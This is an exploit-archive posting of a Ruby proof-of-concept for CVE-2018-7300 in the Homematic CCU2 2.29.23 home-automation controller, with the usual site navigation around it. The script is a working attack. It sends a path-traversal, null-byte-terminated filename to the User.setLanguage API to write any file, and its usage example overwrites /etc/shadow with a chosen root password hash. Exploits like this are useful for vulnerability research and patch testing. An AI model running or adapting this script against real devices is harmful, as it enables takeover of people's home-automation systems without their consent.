Homematic CCU2 2.29.23 Arbitrary File Write

Homematic CCU2 2.29.23 Arbitrary File Write: Posted Mar 31, 2018; Authored by Patrick Muench, Gregor Kopf; Homematic CCU2 version 2.29.23 suffers from an arbitrary file write vulnerability.; tags | exploit, arbitrary; advisories | CVE-2018-7300; SHA-256 | dd409c7f1b228ba72e9d1b5031af8e53c65f1eacf0f69e50abd6527af29fc5a5; Download | Favorite | View

Homematic CCU2 2.29.23 Arbitrary File Write

#!/usr/bin/ruby
 
# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300
 
# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite
 
require 'net/http'
require 'net/https'
require 'uri'
require 'json'
 
unless ARGV.length == 3
  STDOUT.puts <<-EOF
Please provide url
 
Usage:
  write_files.rb <ip.adress> <file path> <content of the file>
 
Example:
  write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
 
  or
 
  write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
 
EOF
  exit
end
 
# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"
 
# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]
 
# The third argument specifies the content of the file
homematic_file_content = ARGV[2]
 
# define the json body for the attack
body = {
        "version": "1.1",
        "method": "User.setLanguage",
        "params": {
                    "userName": "file path",
                    "userLang": "file content"
                  }
        }.to_hash
 
# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
 
# define the content
body[:params][:userLang] = homematic_file_content
 
# split the uri to access it in a easier way
uri = URI.parse(url)
 
# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
 
  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)
 
  # define the content type of the http request
  request.content_type = 'application/json'
 
  # define the request body
  request.body = body.to_json
 
  # send the request to the homematic ccu2
  response = http.request(request)
 
  # print response message code and status to cli
  puts 'Response code: ' + response.code + ' ' + response.message
end

Top Authors In Last 30 Days

Red Hat 223 files
indoushka 170 files
Jay Turla 150 files
Ubuntu 79 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,177)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,794)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,845)
UNIX (9,454)
UnixWare (188)
Windows (6,771)
Other

Homematic CCU2 2.29.23 Arbitrary File Write

Homematic CCU2 2.29.23 Arbitrary File Write

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Homematic CCU2 2.29.23 Arbitrary File Write

Share This

Homematic CCU2 2.29.23 Arbitrary File Write

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems